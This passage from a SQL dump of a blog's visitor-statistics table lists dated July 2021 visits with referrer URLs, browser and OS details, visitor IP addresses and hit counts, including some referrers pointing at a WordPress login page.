(12353,'2021-07-21','http://ictbank.ir/blog','Unknown','Android','10',NULL,NULL,'','42.192.17.155','000',0,2,0),
(12354,'2021-07-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,12,0),
(12355,'2021-07-21','http://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','23.228.109.147','000',0,6,0),
(12356,'2021-07-21','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','169.44.27.213','000',0,1,0),
(12357,'2021-07-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','46.8.19.172','000',0,2,0),
(12358,'2021-07-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.130.151.181','000',0,2,0),
(12359,'2021-07-21','http://ictbank.ir/blog','Unknown','Windows','10.0',NULL,NULL,'','45.12.223.138','000',0,8,0),
(12360,'2021-07-21','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','178.49.119.5','000',0,2,0),
(12361,'2021-07-21','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','52.176.7.37','000',0,2,0),
(12362,'2021-07-21','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','42.118.51.117','000',0,2,0),
(12363,'2021-07-21','http://ictbank.ir/blog','Android Browser','Android','10',NULL,NULL,'','46.182.107.29','000',0,1,0),
(12364,'2021-07-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(12365,'2021-07-21','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','49.36.91.200','000',0,2,0),
(12366,'2021-07-21','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','92.38.180.41','000',0,5,0),
(12367,'2021-07-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.189.36.222','000',0,2,0),
(12368,'2021-07-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(12369,'2021-07-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.218.249.235','000',0,1,0),
(12370,'2021-07-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,1,0),
(12371,'2021-07-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.93.235','000',0,1,0),
(12372,'2021-07-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(12373,'2021-07-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(12374,'2021-07-21','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','112.101.150.121','000',0,2,0),
(12375,'2021-07-21','http://ictbank.ir','Internet Explorer','Windows','6.1',NULL,NULL,'','45.154.2.94','000',0,2,0),
(12376,'2021-07-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(12377,'2021-07-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.213.188.242','000',0,2,0),
(12378,'2021-07-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.213.188.242','000',0,1,0),
(12379,'2021-07-22','https://www.google.com/','Chrome','Android','10',NULL,NULL,'','179.209.143.151','000',0,2,0),
(12380,'2021-07-22','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(12381,'2021-07-22','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','188.165.229.219','000',0,1,0),
(12382,'2021-07-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(12383,'2021-07-22','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','113.190.201.109','000',0,2,0),
(12384,'2021-07-22','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(12385,'2021-07-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.87.233','000',0,1,0),
(12386,'2021-07-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(12387,'2021-07-22','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','185.220.102.241','000',0,1,0),
(12388,'2021-07-22','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','171.25.193.78','000',0,1,0),
(12389,'2021-07-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(12390,'2021-07-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.126','000',0,2,0),
(12391,'2021-07-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.211.139.203','000',0,1,0),
(12392,'2021-07-22','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','200.10.41.157','000',0,2,0),
(12393,'2021-07-22','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','161.0.9.249','000',0,10,0),
(12394,'2021-07-22','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','172.104.27.221','000',0,2,0),
(12395,'2021-07-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.7.193','000',0,1,0),
(12396,'2021-07-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(12397,'2021-07-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,2,0),
(12398,'2021-07-22','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','185.220.100.243','000',0,1,0),
(12399,'2021-07-22','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','100.21.218.158','000',0,1,0),
(12400,'2021-07-22','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.235.85.91','000',0,1,0),
(12401,'2021-07-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.95.203.57','000',0,2,0),
(12402,'2021-07-23','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','91.226.241.53','000',0,2,0),
(12403,'2021-07-23','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(12404,'2021-07-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(12405,'2021-07-23','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','100.21.218.158','000',0,2,0),
(12406,'2021-07-23','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(12407,'2021-07-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.101.151','000',0,2,0),
(12408,'2021-07-23','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.178','000',0,3,0),
(12409,'2021-07-23','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','102.128.142.71','000',0,10,0),
(12410,'2021-07-23','http://ictbank.ir/blog','Chrome','Android','6.0',NULL,NULL,'','120.35.11.210','000',0,1,0),
(12411,'2021-07-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.126','000',0,2,0),
(12412,'2021-07-23','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','89.56.169.117','000',0,2,0),
(12413,'2021-07-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','42.113.154.76','000',0,3,0),
(12414,'2021-07-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.186.8.216','000',0,1,0),
(12415,'2021-07-23','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','190.193.19.209','000',0,2,0),
(12416,'2021-07-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,1,0),
(12417,'2021-07-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.7.193','000',0,1,0),
(12418,'2021-07-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(12419,'2021-07-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(12420,'2021-07-23','http://ictbank.ir/blog','Firefox','Windows','Unknown',NULL,NULL,'','205.185.223.48','000',0,2,0),
(12421,'2021-07-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(12422,'2021-07-23','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','27.115.124.36','000',0,1,0),
(12423,'2021-07-23','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','27.115.124.10','000',0,1,0),
(12424,'2021-07-24','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(12425,'2021-07-24','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.165.190.34','000',0,2,0),
(12426,'2021-07-24','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,12,0),
(12427,'2021-07-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.191.249.97','000',0,1,0),
(12428,'2021-07-24','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.217','000',0,1,0),
(12429,'2021-07-24','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.236','000',0,1,0),
(12430,'2021-07-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','223.233.68.205','000',0,1,0),
(12431,'2021-07-24','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.175','000',0,1,0),
(12432,'2021-07-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.204.9','000',0,1,0),
(12433,'2021-07-24','http://design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','196.188.48.192','000',0,2,0),
(12434,'2021-07-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.244.110.4','000',0,2,0),
(12435,'2021-07-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.91.104','000',0,1,0),
(12436,'2021-07-24','http://82.102.9.14:80/blog','Chrome','Linux','Unknown',NULL,NULL,'','2.57.122.20','000',0,2,0),
(12437,'2021-07-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(12438,'2021-07-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.128.254.37','000',0,1,0),
(12439,'2021-07-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(12440,'2021-07-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(12441,'2021-07-24','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','177.17.121.58','000',0,2,0),
(12442,'2021-07-24','http://ictbank.ir/blog','Chrome','OS X','10.15.2',NULL,NULL,'','167.99.48.249','000',0,1,0),
(12443,'2021-07-24','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(12444,'2021-07-25','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','185.151.125.197','000',0,1,0),
(12445,'2021-07-25','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.43','000',0,2,0),
(12446,'2021-07-25','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','192.126.162.66','000',0,21,0),
(12447,'2021-07-25','http://design-arena.ir/blog','Firefox','OS X','10.12',NULL,NULL,'','3.83.235.100','000',0,2,0),
(12448,'2021-07-25','http://ictbank.ir/blog','Firefox','OS X','10.12',NULL,NULL,'','54.91.215.223','000',0,1,0),
(12449,'2021-07-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.12.118.146','000',0,2,0),
(12450,'2021-07-25','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.12','000',0,2,0),
(12451,'2021-07-25','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','44.192.17.46','000',0,1,0),
(12452,'2021-07-25','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(12453,'2021-07-25','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','46.101.9.216','000',0,1,0),
(12454,'2021-07-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.204.32','000',0,1,0),
(12455,'2021-07-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.71.193.212','000',0,1,0),
(12456,'2021-07-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(12457,'2021-07-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(12458,'2021-07-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(12459,'2021-07-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,2,0),
(12460,'2021-07-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(12461,'2021-07-25','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,2,0),
(12462,'2021-07-25','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','34.221.54.136','000',0,2,0),
(12463,'2021-07-25','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','44.242.162.50','000',0,1,0),
(12464,'2021-07-25','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','60.54.15.40','000',0,2,0),
(12465,'2021-07-26','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','6.3',NULL,NULL,'','92.204.174.134','000',0,3,0),
(12466,'2021-07-26','http://82.102.9.14:80/blog','Unknown','Android','10',NULL,NULL,'','1.15.175.155','000',0,2,0),
(12467,'2021-07-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(12468,'2021-07-26','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(12469,'2021-07-26','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','118.99.96.18','000',0,2,0),
(12470,'2021-07-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(12471,'2021-07-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.189.148.58','000',0,2,0),
(12472,'2021-07-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.23.3.171','000',0,1,0),
(12473,'2021-07-26','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(12474,'2021-07-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(12475,'2021-07-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,1,0),
(12476,'2021-07-26','http://mail.design-arena.ir/blog','Chrome','Android','9',NULL,NULL,'','61.135.15.164','000',0,2,0),
(12477,'2021-07-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.45.90','000',0,1,0),
(12478,'2021-07-26','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','199.187.211.233','000',0,2,0),
(12479,'2021-07-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(12480,'2021-07-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,1,0),
(12481,'2021-07-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.128.254.37','000',0,1,0),
(12482,'2021-07-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(12483,'2021-07-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(12484,'2021-07-26','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','159.69.215.232','000',0,1,0),
(12485,'2021-07-26','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,1,0),
(12486,'2021-07-27','http://design-arena.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','159.69.212.120','000',0,2,0),
(12487,'2021-07-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','165.227.230.141','000',0,4,0),
(12488,'2021-07-27','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,12,0),
(12489,'2021-07-27','http://ictbank.ir/blog','Firefox','OS X','10.15',NULL,NULL,'','5.114.173.162','000',0,1,0),
(12490,'2021-07-27','http://82.102.9.14/blog','Chrome','Linux','Unknown',NULL,NULL,'','125.64.94.144','000',0,2,0),
(12491,'2021-07-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','69.51.24.27','000',0,2,0),
(12492,'2021-07-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.13.239','000',0,1,0),
(12493,'2021-07-27','http://82.102.9.14/blog','Chrome','Linux','Unknown',NULL,NULL,'','125.64.94.138','000',0,2,0),
(12494,'2021-07-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(12495,'2021-07-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.148.241','000',0,1,0),
(12496,'2021-07-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(12497,'2021-07-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.200.197','000',0,1,0),
(12498,'2021-07-27','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','94.155.33.99','000',0,5,0),
(12499,'2021-07-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(12500,'2021-07-27','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','66.220.149.36','000',0,1,0),
(12501,'2021-07-27','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(12502,'2021-07-28','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','54.203.73.198','000',0,1,0),
(12503,'2021-07-28','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','180.252.119.203','000',0,1,0),
(12504,'2021-07-28','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','124.106.144.18','000',0,2,0),
(12505,'2021-07-28','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','173.252.95.120','000',0,1,0),
(12506,'2021-07-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','92.118.77.10','000',0,3,0),
(12507,'2021-07-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(12508,'2021-07-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.42.39.157','000',0,2,0),
(12509,'2021-07-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(12510,'2021-07-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(12511,'2021-07-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.166.151','000',0,1,0),
(12512,'2021-07-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','209.107.210.97','000',0,2,0),
(12513,'2021-07-28','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','207.180.193.247','000',0,2,0),
(12514,'2021-07-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.166.204.16','000',0,1,0),
(12515,'2021-07-28','anonymousfox.co','Chrome','Windows','10.0',NULL,NULL,'','212.192.241.205','000',0,2,0),
(12516,'2021-07-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','167.71.11.97','000',0,1,0),
(12517,'2021-07-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,1,0),
(12518,'2021-07-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(12519,'2021-07-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.200.197','000',0,1,0),
(12520,'2021-07-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.237','000',0,2,0),
(12521,'2021-07-28','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(12522,'2021-07-28','http://design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','180.251.135.41','000',0,2,0),
(12523,'2021-07-28','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','102.128.142.71','000',0,2,0),
(12524,'2021-07-29','http://ictbank.ir/blog','Yandex Browser','Windows','6.1',NULL,NULL,'','92.118.77.10','000',0,3,0),
(12525,'2021-07-29','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,2,0),
(12526,'2021-07-29','http://82.102.9.14/blog','Chrome','OS X','10.12.2',NULL,NULL,'','47.245.53.145','000',0,1,0),
(12527,'2021-07-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.234','000',0,2,0),
(12528,'2021-07-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(12529,'2021-07-29','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,12,0),
(12530,'2021-07-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.208.239.116','000',0,2,0),
(12531,'2021-07-29','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.65.230','000',0,1,0),
(12532,'2021-07-29','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','181.169.50.90','000',0,2,0),
(12533,'2021-07-29','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(12534,'2021-07-29','http://ictbank.ir/blog','Chrome','Android','11',NULL,NULL,'','5.124.157.49','000',0,1,0),
(12535,'2021-07-29','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(12536,'2021-07-29','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','185.67.82.114','000',0,2,0),
(12537,'2021-07-29','anonymousfox.co','Chrome','Windows','10.0',NULL,NULL,'','157.90.127.115','000',0,1,0),
(12538,'2021-07-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.162.242','000',0,1,0),
(12539,'2021-07-29','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','185.220.101.22','000',0,1,0),
(12540,'2021-07-29','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.238.34.50','000',0,1,0),
(12541,'2021-07-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.213.78','000',0,1,0),
(12542,'2021-07-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.148.183','000',0,1,0),
(12543,'2021-07-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.166.25','000',0,1,0),
(12544,'2021-07-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(12545,'2021-07-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.206.46','000',0,1,0),
(12546,'2021-07-29','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','104.237.150.227','000',0,2,0),
(12547,'2021-07-29','http://ictbank.ir/blog','Safari','iOS','11.0',NULL,NULL,'','95.216.15.49','000',0,1,0),
(12548,'2021-07-30','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','159.242.234.211','000',0,5,0),
(12549,'2021-07-30','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.192','000',0,5,0),
(12550,'2021-07-30','http://design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','51.235.159.136','000',0,1,0),
(12551,'2021-07-30','http://82.102.9.14:80/blog','Safari','OS X','10.14.6',NULL,NULL,'','185.55.248.39','000',0,4,0),
(12552,'2021-07-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.208.39','000',0,1,0),
(12553,'2021-07-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(12554,'2021-07-30','http://ictbank.ir/blog','Firefox','OS X','10.9',NULL,NULL,'','31.40.210.103','000',0,1,0),
(12555,'2021-07-30','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','27.115.124.38','000',0,1,0),
(12556,'2021-07-30','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','42.236.10.106','000',0,1,0),
(12557,'2021-07-30','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','42.236.10.93','000',0,1,0),
(12558,'2021-07-30','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','76.72.172.162','000',0,2,0),
(12559,'2021-07-30','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','109.254.125.212','000',0,6,0),
(12560,'2021-07-30','http://www.ictbank.ir/blog','Chrome','Android','9',NULL,NULL,'','124.126.78.139','000',0,2,0),
(12561,'2021-07-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.214.168.53','000',0,2,0),
(12562,'2021-07-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.204.91','000',0,1,0),
(12563,'2021-07-30','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','109.235.58.226','000',0,1,0),
(12564,'2021-07-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.155.30.101','000',0,1,0),
(12565,'2021-07-30','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(12566,'2021-07-30','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','201.231.187.198','000',0,1,0),
(12567,'2021-07-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(12568,'2021-07-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.97.252','000',0,1,0),
(12569,'2021-07-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','216.151.191.63','000',0,1,0),
(12570,'2021-07-30','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.186.143.228','000',0,2,0),
(12571,'2021-07-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.213.78','000',0,1,0),
(12572,'2021-07-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,1,0),
(12573,'2021-07-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.166.25','000',0,1,0),
(12574,'2021-07-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(12575,'2021-07-30','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.163.109.66','000',0,2,0),
(12576,'2021-07-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','109.248.201.100','000',0,2,0),
(12577,'2021-07-30','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','103.165.167.6','000',0,2,0),
(12578,'2021-07-30','http://ictbank.ir/blog','Unknown','Windows','5.1',NULL,NULL,'','138.201.60.47','000',0,1,0),
